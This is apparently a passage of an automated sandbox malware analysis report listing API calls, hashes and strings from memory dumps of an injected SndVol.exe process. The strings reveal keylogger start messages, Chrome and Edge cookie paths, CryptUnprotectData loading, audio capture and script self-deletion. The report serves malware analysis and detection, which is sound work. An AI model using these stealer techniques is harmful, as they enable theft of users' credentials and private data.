                                                                        • Opcode Fuzzy Hash: 65e47024088546fc334146591d56820f873165bf99cfabfd31b4add3ed5f98c2
                                                                        • Instruction Fuzzy Hash: CF31A27180424ABFEF11AFA5CC448AF3B68EF04369B10415AFD11962A2DB31FD51DB62
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,2915DD92,?,?,?,00000001,00000000,?,00000001,2915DD92,2915DD92), ref: 291811F9
                                                                        • __alloca_probe_16.LIBCMT ref: 29181231
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,2915DD92,?,?,?,00000001,00000000,?,00000001,2915DD92,2915DD92,?), ref: 29181282
                                                                        • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,2915DD92,2915DD92,?,00000002,00000000), ref: 29181294
                                                                        • __freea.LIBCMT ref: 2918129D
                                                                          • Part of subcall function 291761B8: HeapAlloc.KERNEL32(00000000,29165329,?,?,291688C7,?,?,00000000,?,?,2913DE9D,29165329,?,?,?,?), ref: 291761EA
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                                                        • String ID:
                                                                        • API String ID: 1857427562-0
                                                                        • Opcode ID: 912a8074eb76231132fd63e2c0bdc909aa1bd47a7d7cf30e66a5a88f5fef321d
                                                                        • Instruction ID: b6fffaad0e66cdf57e06a7314af887f35926d3fe933376e8af79799cb1f4728c
                                                                        • Opcode Fuzzy Hash: 912a8074eb76231132fd63e2c0bdc909aa1bd47a7d7cf30e66a5a88f5fef321d
                                                                        • Instruction Fuzzy Hash: DE31D272E0020AABEF188F66CC44DEE7BA6FF40758F104168FC04D6190E735DA62DB90
                                                                        APIs
                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 29131BF9
                                                                        • waveInOpen.WINMM(291A2AC0,000000FF,291A2AA8,Function_00001D0B,00000000,00000000,00000024), ref: 29131C8F
                                                                        • waveInPrepareHeader.WINMM(291A2A88,00000020), ref: 29131CE3
                                                                        • waveInAddBuffer.WINMM(291A2A88,00000020), ref: 29131CF2
                                                                        • waveInStart.WINMM ref: 29131CFE
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                        • String ID:
                                                                        • API String ID: 1356121797-0
                                                                        • Opcode ID: 2e7a7053cf5c61a69f02ef0892afc8ef6e9c339fec9b4177be093f619aa179e8
                                                                        • Instruction ID: 742b8a6b64c0bb7a18c102fe913f3e4b0689d675653080c7b17a0cb970771641
                                                                        • Opcode Fuzzy Hash: 2e7a7053cf5c61a69f02ef0892afc8ef6e9c339fec9b4177be093f619aa179e8
                                                                        • Instruction Fuzzy Hash: 97217F31704288AFD72DFF67E8485297BBBBBA4314B205C29A005D7E98D73C4D02CB18
                                                                        APIs
                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 2917F3E3
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 2917F406
                                                                          • Part of subcall function 291761B8: HeapAlloc.KERNEL32(00000000,29165329,?,?,291688C7,?,?,00000000,?,?,2913DE9D,29165329,?,?,?,?), ref: 291761EA
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 2917F42C
                                                                        • _free.LIBCMT ref: 2917F43F
                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 2917F44E
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                        • String ID:
                                                                        • API String ID: 2278895681-0
                                                                        • Opcode ID: b5afe4f4b2e35fbc5c10aa2b49a5a790e3c4afda1876a19030fed466462d1260
                                                                        • Instruction ID: 5a772cadb2fc53d56a0ea4e3f8876ba85c8c25ad3c20ae49387a9dc9a2c37716
                                                                        • Opcode Fuzzy Hash: b5afe4f4b2e35fbc5c10aa2b49a5a790e3c4afda1876a19030fed466462d1260
                                                                        • Instruction Fuzzy Hash: 4A019E72B023567B231216B79C8CCFB2A7CEEC6AA83514179BE05D2300DB648E0391B1
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,29196478,00000000,00000000,2913D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 2914C4C1
                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 2914C4DE
                                                                        • CloseHandle.KERNEL32(00000000), ref: 2914C4EA
                                                                        • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 2914C4FB
                                                                        • CloseHandle.KERNEL32(00000000), ref: 2914C508
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$CloseHandle$CreatePointerWrite
                                                                        • String ID:
                                                                        • API String ID: 1852769593-0
                                                                        • Opcode ID: 839426a2c113d6e5f283527ef16157fd2e0944c8cdb33a65c47873d9153f1d08
                                                                        • Instruction ID: e2f6a2b54ae6cbeb5078c5c585d430d57bb019b50ba8b91b46887316a7f05532
                                                                        • Opcode Fuzzy Hash: 839426a2c113d6e5f283527ef16157fd2e0944c8cdb33a65c47873d9153f1d08
                                                                        • Instruction Fuzzy Hash: F011E5B1B041157FE6055A36EE8DEFB739CEB4A368F00962AF911D61C0D6258E0286B0
                                                                        APIs
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 291411AB
                                                                        • int.LIBCPMT ref: 291411BE
                                                                          • Part of subcall function 2913E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 2913E10D
                                                                          • Part of subcall function 2913E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 2913E127
                                                                        • std::_Facet_Register.LIBCPMT ref: 291411FE
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 29141207
                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 29141225
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                        • String ID:
                                                                        • API String ID: 2536120697-0
                                                                        • Opcode ID: c723fe7322f0136205be4274ea211582f8087e1b18aa1cbb7504a9240be0d0bb
                                                                        • Instruction ID: 6999fcc9de92cebcf312065a2a1a22b013eefe72c2136dc09c4e236b6cc2c055
                                                                        • Opcode Fuzzy Hash: c723fe7322f0136205be4274ea211582f8087e1b18aa1cbb7504a9240be0d0bb
                                                                        • Instruction Fuzzy Hash: B2110632E00218B7CB04DBAADC40CDD7B79AF64668B21955AE905F72A0DB309F13CBD0
                                                                        APIs
                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0445B113
                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0445B12C
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Value___vcrt_
                                                                        • String ID:
                                                                        • API String ID: 1426506684-0
                                                                        • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                        • Instruction ID: e9b7f551ec90be59728581ff91109ad2994aa555136c97043234f6170cd4ca9f
                                                                        • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                        • Instruction Fuzzy Hash: 1A01D872209791AEBF643A7D6C94A672748FB016FAB20023FEE18429FBEE1178815144
                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,00000000,00000000,2916BCD6,00000000,00000000,?,2916BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 2917831E
                                                                        • _free.LIBCMT ref: 29178353
                                                                        • _free.LIBCMT ref: 2917837A
                                                                        • SetLastError.KERNEL32(00000000,?,29135103), ref: 29178387
                                                                        • SetLastError.KERNEL32(00000000,?,29135103), ref: 29178390
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLast$_free
                                                                        • String ID:
                                                                        • API String ID: 3170660625-0
                                                                        • Opcode ID: 2ac1df89e57a073b5251ffcc93ebe45e95cb68a48a8eb7d3974a94be20ddf5d7
                                                                        • Instruction ID: ec47f4ce6f577d36507428f4392bb210c0d43604b2e5c8cd794d16cde38f8938
                                                                        • Opcode Fuzzy Hash: 2ac1df89e57a073b5251ffcc93ebe45e95cb68a48a8eb7d3974a94be20ddf5d7
                                                                        • Instruction Fuzzy Hash: 9D01F9367407433A9306663B9CC5DFA227EABE23FC7364665F91492141EB38CB078130
                                                                        APIs
                                                                        • _free.LIBCMT ref: 29180A54
                                                                          • Part of subcall function 29176802: HeapFree.KERNEL32(00000000,00000000,?,29180CEF,?,00000000,?,00000000,?,29180F93,?,00000007,?,?,291814DE,?), ref: 29176818
                                                                          • Part of subcall function 29176802: GetLastError.KERNEL32(?,?,29180CEF,?,00000000,?,00000000,?,29180F93,?,00000007,?,?,291814DE,?,?), ref: 2917682A
                                                                        • _free.LIBCMT ref: 29180A66
                                                                        • _free.LIBCMT ref: 29180A78
                                                                        • _free.LIBCMT ref: 29180A8A
                                                                        • _free.LIBCMT ref: 29180A9C
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: 234d2adb558dea289e65a02932f19f3b0b41adaa6e358b51310be8a89e833622
                                                                        • Instruction ID: de7f684bdab8acafe78bc25312c831e1f059757fd50a694e42681fa2d815481b
                                                                        • Opcode Fuzzy Hash: 234d2adb558dea289e65a02932f19f3b0b41adaa6e358b51310be8a89e833622
                                                                        • Instruction Fuzzy Hash: 62F06271A043087B9744EA6FE881CE633EABF30798760DD05F14AD7540C734FE828A50
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID:
                                                                        • API String ID: 269201875-0
                                                                        APIs
                                                                        • _free.LIBCMT ref: 29174106
                                                                          • Part of subcall function 29176802: HeapFree.KERNEL32(00000000,00000000,?,29180CEF,?,00000000,?,00000000,?,29180F93,?,00000007,?,?,291814DE,?), ref: 29176818
                                                                          • Part of subcall function 29176802: GetLastError.KERNEL32(?,?,29180CEF,?,00000000,?,00000000,?,29180F93,?,00000007,?,?,291814DE,?,?), ref: 2917682A
                                                                        • _free.LIBCMT ref: 29174118
                                                                        • _free.LIBCMT ref: 2917412B
                                                                        • _free.LIBCMT ref: 2917413C
                                                                        • _free.LIBCMT ref: 2917414D
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID:
                                                                        • API String ID: 269201875-0
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __aulldiv
                                                                        • String ID: LfF$xdF$NG
                                                                        • API String ID: 3732870572-2534066922
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __dosmaperr
                                                                        • String ID: H
                                                                        • API String ID: 2332233096-2852464175
                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 04429569
                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0442964A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Exception@8H_prologThrow
                                                                        • String ID: xdF$y~E
                                                                        • API String ID: 3222999186-3309775686
                                                                        APIs
                                                                        • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 29143AF7
                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 29143B26
                                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 29143BC6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Enum$InfoQueryValue
                                                                        • String ID: [regsplt]
                                                                        • API String ID: 3554306468-4262303796
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: H_prolog
                                                                        • String ID: PG$PG$PG
                                                                        • API String ID: 3519838083-760986564
                                                                        APIs
                                                                        • _strpbrk.LIBCMT ref: 2917E7B8
                                                                        • _free.LIBCMT ref: 2917E8D5
                                                                          • Part of subcall function 2916BD68: IsProcessorFeaturePresent.KERNEL32(00000017,2916BD3A,29135103,?,00000000,00000000,291320A6,00000000,00000000,?,2916BD5A,00000000,00000000,00000000,00000000,00000000), ref: 2916BD6A
                                                                          • Part of subcall function 2916BD68: GetCurrentProcess.KERNEL32(C0000417,?,29135103), ref: 2916BD8C
                                                                          • Part of subcall function 2916BD68: TerminateProcess.KERNEL32(00000000,?,29135103), ref: 2916BD93
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                        • String ID: *?$.
                                                                        • API String ID: 2812119850-3972193922
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free_strpbrk
                                                                        • String ID: *?$.
                                                                        • API String ID: 3300345361-3972193922
                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\SndVol.exe,00000104), ref: 29173515
                                                                        • _free.LIBCMT ref: 291735E0
                                                                        • _free.LIBCMT ref: 291735EA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$FileModuleName
                                                                        • String ID: C:\Windows\SysWOW64\SndVol.exe
                                                                        • API String ID: 2506810119-3942169294
                                                                        APIs
                                                                          • Part of subcall function 2913C4FE: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 2913C531
                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 2913C658
                                                                        • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 2913C6C3
                                                                        Strings
                                                                        • User Data\Default\Network\Cookies, xrefs: 2913C63E
                                                                        • User Data\Profile ?\Network\Cookies, xrefs: 2913C670
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExistsFilePath
                                                                        • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                        • API String ID: 1174141254-1980882731
                                                                        APIs
                                                                          • Part of subcall function 2913C561: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 2913C594
                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 2913C727
                                                                        • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 2913C792
                                                                        Strings
                                                                        • User Data\Default\Network\Cookies, xrefs: 2913C70D
                                                                        • User Data\Profile ?\Network\Cookies, xrefs: 2913C73F
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExistsFilePath
                                                                        • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                        • API String ID: 1174141254-1980882731
                                                                        APIs
                                                                        • CreateThread.KERNEL32(00000000,00000000,2913A2B8,?,00000000,00000000), ref: 2913A239
                                                                        • CreateThread.KERNEL32(00000000,00000000,2913A2A2,?,00000000,00000000), ref: 2913A249
                                                                        • CreateThread.KERNEL32(00000000,00000000,2913A2C4,?,00000000,00000000), ref: 2913A255
                                                                          • Part of subcall function 2913B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 2913B1AD
                                                                          • Part of subcall function 2913B19F: wsprintfW.USER32 ref: 2913B22E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateThread$LocalTimewsprintf
                                                                        • String ID: Offline Keylogger Started
                                                                        • API String ID: 465354869-4114347211
                                                                        APIs
                                                                          • Part of subcall function 2913B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 2913B1AD
                                                                          • Part of subcall function 2913B19F: wsprintfW.USER32 ref: 2913B22E
                                                                          • Part of subcall function 2914B580: GetLocalTime.KERNEL32(00000000), ref: 2914B59A
                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 2913AFA9
                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 2913AFB5
                                                                        • CreateThread.KERNEL32(00000000,00000000,2913A2D0,?,00000000,00000000), ref: 2913AFC1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateThread$LocalTime$wsprintf
                                                                        • String ID: Online Keylogger Started
                                                                        • API String ID: 112202259-1258561607
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 29136ABD
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 29136AC4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: CryptUnprotectData$crypt32
                                                                        • API String ID: 2574300362-2380590389
                                                                        • Opcode ID: 6f88d7ebfbe163485ec3a668016404f6ce97b76c61a047ac0082684c9a46774e
                                                                        • Instruction ID: 113134219141b034d2935b4445a0108845d5b457ba2fde39489e4bedbf8574e5
                                                                        • Opcode Fuzzy Hash: 6f88d7ebfbe163485ec3a668016404f6ce97b76c61a047ac0082684c9a46774e
                                                                        • Instruction Fuzzy Hash: 6101D835B0424AABDB0CDFAFD845DAE7BB8AF44388B40416DE955D3249DA349A01CBA0
                                                                        APIs
                                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,29135159), ref: 29135173
                                                                        • CloseHandle.KERNEL32(?), ref: 291351CA
                                                                        • SetEvent.KERNEL32(?), ref: 291351D9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEventHandleObjectSingleWait
                                                                        • String ID: Connection Timeout
                                                                        • API String ID: 2055531096-499159329
                                                                        • Opcode ID: f1fac4c4778a6125886f18e71131034301118207b8d2e9aa831d1db49002ee90
                                                                        • Instruction ID: 3784dda3256677c534ed2a54fee2f6d11e1cee85e4a9fe76f4a660d102046705
                                                                        • Opcode Fuzzy Hash: f1fac4c4778a6125886f18e71131034301118207b8d2e9aa831d1db49002ee90
                                                                        • Instruction Fuzzy Hash: FD01F235B50B80BFE729BB37CCC485BBFF1BF116193800A2DD58382A65DA34A602CB51
                                                                        APIs
                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 2913E86E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Exception@8Throw
                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                        • API String ID: 2005118841-1866435925
                                                                        • Opcode ID: ad480fc4295b3075b0a664cc6351894310b35289acdafaed96f539bd3f38d2b5
                                                                        • Instruction ID: 296ba9b172e27b9647bccacde6da0341af2f0c4e5d21f88b4b38e074e6cb3b47
                                                                        • Opcode Fuzzy Hash: ad480fc4295b3075b0a664cc6351894310b35289acdafaed96f539bd3f38d2b5
                                                                        • Instruction Fuzzy Hash: 4401D660D103087BEB48D697EC41FFE73785F2034CFC0D599AE0165481EA216B03CA6A
                                                                        Strings
                                                                        • C:\Windows\SysWOW64\SndVol.exe, xrefs: 291376FF
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: C:\Windows\SysWOW64\SndVol.exe
                                                                        • API String ID: 0-3942169294
                                                                        • Opcode ID: e7ab4eae7b4e2361a092d1e1a15b6ff2cb8f1caaa429e93ef870297320e1f567
                                                                        • Instruction ID: 3f5fb8e650e8d31af8feb731e42b46d0f8c6d0f25c910802c91b55f7a1f0fe7b
                                                                        • Opcode Fuzzy Hash: e7ab4eae7b4e2361a092d1e1a15b6ff2cb8f1caaa429e93ef870297320e1f567
                                                                        • Instruction Fuzzy Hash: 1CF0F6B4B10184ABFB0C7637982C69C3ABB6F9028EFC04815E402DA189EB280F07C314
                                                                        APIs
                                                                        • RegCreateKeyW.ADVAPI32(80000001,00000000,291A52D8), ref: 2914385A
                                                                        • RegSetValueExW.ADVAPI32(291A52D8,?,00000000,00000001,00000000,00000000,291A52F0,?,2913F85E,pth_unenc,291A52D8), ref: 29143888
                                                                        • RegCloseKey.ADVAPI32(291A52D8,?,2913F85E,pth_unenc,291A52D8), ref: 29143893
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseCreateValue
                                                                        • String ID: pth_unenc
                                                                        • API String ID: 1818849710-4028850238
                                                                        • Opcode ID: 63c0a71e5b09e591b2911ba552f3db8dd85b640ed73f9682d8f709042480d478
                                                                        • Instruction ID: 8ea61e0e66ef008eb90526cceb55348023a8f6c1ed9221668c9c743cee7623a6
                                                                        • Opcode Fuzzy Hash: 63c0a71e5b09e591b2911ba552f3db8dd85b640ed73f9682d8f709042480d478
                                                                        • Instruction Fuzzy Hash: 15F04971940118BBEF00ABA2ED49EEE777CFB44759F108615B80696150EB369B06DB90
                                                                        APIs
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 2913DFEC
                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 2913E02B
                                                                          • Part of subcall function 291656CD: _Yarn.LIBCPMT ref: 291656EC
                                                                          • Part of subcall function 291656CD: _Yarn.LIBCPMT ref: 29165710
                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 2913E051
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
